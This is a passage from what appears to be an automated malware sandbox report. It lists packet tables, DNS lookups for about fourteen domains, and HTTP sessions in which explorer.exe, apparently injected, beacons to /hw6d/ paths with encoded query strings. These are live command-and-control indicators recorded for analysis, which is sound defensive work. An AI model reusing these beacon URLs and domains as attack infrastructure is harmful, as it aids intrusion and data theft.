                                                                          Apr 29, 2021 07:57:03.484090090 CEST8049745185.178.208.160192.168.2.3
                                                                          Apr 29, 2021 07:57:03.484311104 CEST4974580192.168.2.3185.178.208.160
                                                                          Apr 29, 2021 07:57:03.484453917 CEST4974580192.168.2.3185.178.208.160
                                                                          Apr 29, 2021 07:57:03.799592972 CEST4974580192.168.2.3185.178.208.160
                                                                          Apr 29, 2021 07:57:03.850474119 CEST8049745185.178.208.160192.168.2.3
                                                                          Apr 29, 2021 07:57:13.857108116 CEST4974880192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:57:13.898082972 CEST804974834.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:57:13.898175001 CEST4974880192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:57:13.898264885 CEST4974880192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:57:13.939173937 CEST804974834.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:57:14.035387039 CEST804974834.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:57:14.035420895 CEST804974834.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:57:14.035624981 CEST4974880192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:57:14.035657883 CEST4974880192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:57:14.079200983 CEST804974834.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:57:19.114295959 CEST4974980192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:57:19.158310890 CEST804974934.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:57:19.158452988 CEST4974980192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:57:19.158658028 CEST4974980192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:57:19.204071999 CEST804974934.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:57:19.299715042 CEST804974934.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:57:19.299741983 CEST804974934.102.136.180192.168.2.3
                                                                          Apr 29, 2021 07:57:19.299977064 CEST4974980192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:57:19.300002098 CEST4974980192.168.2.334.102.136.180
                                                                          Apr 29, 2021 07:57:19.343305111 CEST804974934.102.136.180192.168.2.3

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 29, 2021 07:55:00.137916088 CEST5062053192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:00.186779976 CEST53506208.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:01.264853001 CEST6493853192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:01.316481113 CEST53649388.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:02.354083061 CEST6015253192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:02.402847052 CEST53601528.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:03.124618053 CEST5754453192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:03.174473047 CEST53575448.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:03.950566053 CEST5598453192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:03.999561071 CEST53559848.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:05.507833958 CEST6418553192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:05.561997890 CEST53641858.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:05.641577005 CEST6511053192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:05.711791992 CEST53651108.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:06.461194038 CEST5836153192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:06.509907007 CEST53583618.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:08.073846102 CEST6349253192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:08.122512102 CEST53634928.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:08.965342999 CEST6083153192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:09.014267921 CEST53608318.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:09.778877974 CEST6010053192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:09.830401897 CEST53601008.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:11.337450981 CEST5319553192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:11.387829065 CEST53531958.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:12.142550945 CEST5014153192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:12.193989992 CEST53501418.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:13.806135893 CEST5302353192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:13.856694937 CEST53530238.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:15.484189987 CEST4956353192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:15.535653114 CEST53495638.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:16.619965076 CEST5135253192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:16.673099995 CEST53513528.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:17.563497066 CEST5934953192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:17.612196922 CEST53593498.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:18.709223032 CEST5708453192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:18.760696888 CEST53570848.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:19.635569096 CEST5882353192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:19.684365988 CEST53588238.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:33.437978983 CEST5756853192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:33.499932051 CEST53575688.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:52.204142094 CEST5054053192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:52.253021955 CEST53505408.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:55:52.874866009 CEST5436653192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:55:52.923657894 CEST53543668.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:04.627057076 CEST5303453192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:04.981260061 CEST53530348.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:10.001795053 CEST5776253192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:10.066312075 CEST53577628.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:11.164323092 CEST5543553192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:11.224766016 CEST53554358.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:15.270200014 CEST5071353192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:15.427125931 CEST53507138.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:20.788635969 CEST5613253192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:20.848881006 CEST53561328.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:24.932965994 CEST5898753192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:25.010526896 CEST53589878.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:25.866851091 CEST5657953192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:25.940428972 CEST53565798.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:31.240578890 CEST6063353192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:31.309561014 CEST53606338.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:34.578218937 CEST6129253192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:34.631272078 CEST53612928.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:36.618769884 CEST6361953192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:36.829651117 CEST53636198.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:38.170327902 CEST6493853192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:38.232039928 CEST53649388.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:42.447913885 CEST6194653192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:42.543870926 CEST53619468.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:47.678186893 CEST6491053192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:47.747292995 CEST53649108.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:56:57.982219934 CEST5212353192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:56:58.060242891 CEST53521238.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:57:03.211961031 CEST5613053192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:57:03.318926096 CEST53561308.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:57:08.492597103 CEST5633853192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:57:08.770395994 CEST53563388.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:57:09.834830046 CEST5942053192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:57:09.884299994 CEST53594208.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:57:11.827470064 CEST5878453192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:57:11.900938034 CEST53587848.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:57:13.790039062 CEST6397853192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:57:13.856571913 CEST53639788.8.8.8192.168.2.3
                                                                          Apr 29, 2021 07:57:19.052275896 CEST6293853192.168.2.38.8.8.8
                                                                          Apr 29, 2021 07:57:19.113831043 CEST53629388.8.8.8192.168.2.3

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Apr 29, 2021 07:56:04.627057076 CEST192.168.2.38.8.8.80x829bStandard query (0)www.qiqihao.siteA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:10.001795053 CEST192.168.2.38.8.8.80x8df4Standard query (0)www.agteless.comA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:15.270200014 CEST192.168.2.38.8.8.80x6463Standard query (0)www.werealestatephotography.comA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:20.788635969 CEST192.168.2.38.8.8.80x88beStandard query (0)www.designtehengsg.comA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:25.866851091 CEST192.168.2.38.8.8.80x930eStandard query (0)www.missmaltese.comA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:31.240578890 CEST192.168.2.38.8.8.80xffcStandard query (0)www.sueshemp.comA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:36.618769884 CEST192.168.2.38.8.8.80x1c2eStandard query (0)www.onjulitrading.comA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.447913885 CEST192.168.2.38.8.8.80x1192Standard query (0)www.rechnung.proA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:47.678186893 CEST192.168.2.38.8.8.80xa02Standard query (0)www.conegenie.comA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:57.982219934 CEST192.168.2.38.8.8.80xe047Standard query (0)www.thelocallawnmen.comA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:57:03.211961031 CEST192.168.2.38.8.8.80xf2f3Standard query (0)www.lboclkchain.comA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:57:08.492597103 CEST192.168.2.38.8.8.80x9fd6Standard query (0)www.maxim.technologyA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:57:13.790039062 CEST192.168.2.38.8.8.80x676Standard query (0)www.sofiascelebrations.comA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:57:19.052275896 CEST192.168.2.38.8.8.80xbdcfStandard query (0)www.awdcompanies.comA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Apr 29, 2021 07:56:04.981260061 CEST8.8.8.8192.168.2.30x829bName error (3)www.qiqihao.sitenonenoneA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:10.066312075 CEST8.8.8.8192.168.2.30x8df4No error (0)www.agteless.comagteless.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 29, 2021 07:56:10.066312075 CEST8.8.8.8192.168.2.30x8df4No error (0)agteless.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:15.427125931 CEST8.8.8.8192.168.2.30x6463No error (0)www.werealestatephotography.com35.208.69.149A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:20.848881006 CEST8.8.8.8192.168.2.30x88beName error (3)www.designtehengsg.comnonenoneA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:25.940428972 CEST8.8.8.8192.168.2.30x930eNo error (0)www.missmaltese.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 29, 2021 07:56:25.940428972 CEST8.8.8.8192.168.2.30x930eNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:25.940428972 CEST8.8.8.8192.168.2.30x930eNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:25.940428972 CEST8.8.8.8192.168.2.30x930eNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:25.940428972 CEST8.8.8.8192.168.2.30x930eNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:31.309561014 CEST8.8.8.8192.168.2.30xffcNo error (0)www.sueshemp.comsueshemp.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 29, 2021 07:56:31.309561014 CEST8.8.8.8192.168.2.30xffcNo error (0)sueshemp.com198.71.232.3A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:36.829651117 CEST8.8.8.8192.168.2.30x1c2eNo error (0)www.onjulitrading.com154.216.244.232A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)www.rechnung.proparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com188.164.131.200A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:42.543870926 CEST8.8.8.8192.168.2.30x1192No error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:47.747292995 CEST8.8.8.8192.168.2.30xa02No error (0)www.conegenie.comconegenie.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 29, 2021 07:56:47.747292995 CEST8.8.8.8192.168.2.30xa02No error (0)conegenie.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:58.060242891 CEST8.8.8.8192.168.2.30xe047No error (0)www.thelocallawnmen.com216.239.38.21A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:58.060242891 CEST8.8.8.8192.168.2.30xe047No error (0)www.thelocallawnmen.com216.239.34.21A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:58.060242891 CEST8.8.8.8192.168.2.30xe047No error (0)www.thelocallawnmen.com216.239.36.21A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:56:58.060242891 CEST8.8.8.8192.168.2.30xe047No error (0)www.thelocallawnmen.com216.239.32.21A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:57:03.318926096 CEST8.8.8.8192.168.2.30xf2f3No error (0)www.lboclkchain.com185.178.208.160A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:57:08.770395994 CEST8.8.8.8192.168.2.30x9fd6Server failure (2)www.maxim.technologynonenoneA (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:57:13.856571913 CEST8.8.8.8192.168.2.30x676No error (0)www.sofiascelebrations.comsofiascelebrations.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 29, 2021 07:57:13.856571913 CEST8.8.8.8192.168.2.30x676No error (0)sofiascelebrations.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Apr 29, 2021 07:57:19.113831043 CEST8.8.8.8192.168.2.30xbdcfNo error (0)www.awdcompanies.comawdcompanies.comCNAME (Canonical name)IN (0x0001)
                                                                          Apr 29, 2021 07:57:19.113831043 CEST8.8.8.8192.168.2.30xbdcfNo error (0)awdcompanies.com34.102.136.180A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • www.agteless.com
                                                                          • www.werealestatephotography.com
                                                                          • www.missmaltese.com
                                                                          • www.sueshemp.com
                                                                          • www.onjulitrading.com
                                                                          • www.rechnung.pro
                                                                          • www.conegenie.com
                                                                          • www.thelocallawnmen.com
                                                                          • www.lboclkchain.com
                                                                          • www.sofiascelebrations.com
                                                                          • www.awdcompanies.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.34972734.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:56:10.111334085 CEST1354OUTGET /hw6d/?wR9=5qwRj4Cks+XUvhq+/72yLl02AnqHimYvFWLTxgnccFxg28KqBmPa1ezdvIZqmAulhHSP&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.agteless.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:56:10.255534887 CEST1355INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Thu, 29 Apr 2021 05:56:10 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6089cf31-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.34972935.208.69.14980C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:56:15.591011047 CEST1361OUTGET /hw6d/?wR9=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPaWrxhtzEdX&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.werealestatephotography.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:56:15.749929905 CEST1362INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx
                                                                          Date: Thu, 29 Apr 2021 05:56:15 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 162
                                                                          Connection: close
                                                                          Location: https://www.werealestatephotography.com/hw6d/?wR9=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPaWrxhtzEdX&3f=ZlLd8r8PtX
                                                                          Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                          X-HTTPS-Enforce: 1
                                                                          X-Proxy-Cache-Info: DT:1
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          10192.168.2.34974934.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:57:19.158658028 CEST5104OUTGET /hw6d/?wR9=M8b3PqXkcz6dEhacbWPz+tEbXPpZ+zWHtV+3ceu/G8IJbp6ZEJFkth5W4QT35NMVcxfa&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.awdcompanies.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:57:19.299715042 CEST5105INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Thu, 29 Apr 2021 05:57:19 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6089beab-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.349731198.185.159.14480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:56:26.081366062 CEST1381OUTGET /hw6d/?wR9=6RCAxHzHs2U8cKrh6h9/ydGjrhxnSTzcOHDfHkTTDkA8hCV/5sMta/cQsHNALet3pcHc&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.missmaltese.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:56:26.217263937 CEST1383INHTTP/1.1 400 Bad Request
                                                                          Cache-Control: no-cache, must-revalidate
                                                                          Content-Length: 77564
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Date: Thu, 29 Apr 2021 05:56:26 UTC
                                                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                          Pragma: no-cache
                                                                          Server: Squarespace
                                                                          X-Contextid: v5sYFsNz/VNFjv7s5
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 